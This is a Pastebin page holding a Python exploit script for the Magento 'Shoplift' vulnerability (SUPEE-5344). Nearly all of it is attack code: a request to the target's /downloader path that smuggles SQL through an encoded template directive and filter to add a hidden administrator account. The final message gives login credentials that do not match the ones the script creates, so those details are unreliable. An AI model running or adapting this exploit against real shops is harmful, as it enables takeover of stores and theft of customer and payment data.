Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################################################################
- #Exploit Title : Magento Shoplift exploit (SUPEE-5344)
- #Author : Manish Kishan Tanwar AKA error1046
- #Date : 25/08/2015
- #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
- #Debugged At : Indishell Lab(originally developed by joren)
- ##################################################################################################
- import requests
- import base64
- import sys
- target = "http://target.com/"
- if not target.startswith("http"):
- target = "http://" + target
- if target.endswith("/"):
- target = target[:-1]
- target_url = target + "/downloader"
- q="""
- SET @SALT = 'rp';
- SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
- SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
- INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
- INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
- """
- query = q.replace("\n", "").format(username="hailhydra", password="hailhydra")
- pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
- # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
- r = requests.post(target_url,
- data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
- "filter": base64.b64encode(pfilter),
- "forwarded": 1})
- if r.ok:
- print ("WORKED")
- print ("Check {0}/admin with creds forme:forme".format(target))
- else:
- print (r.text)
- print "DID NOT WORK"
Add Comment
Please, Sign In to add comment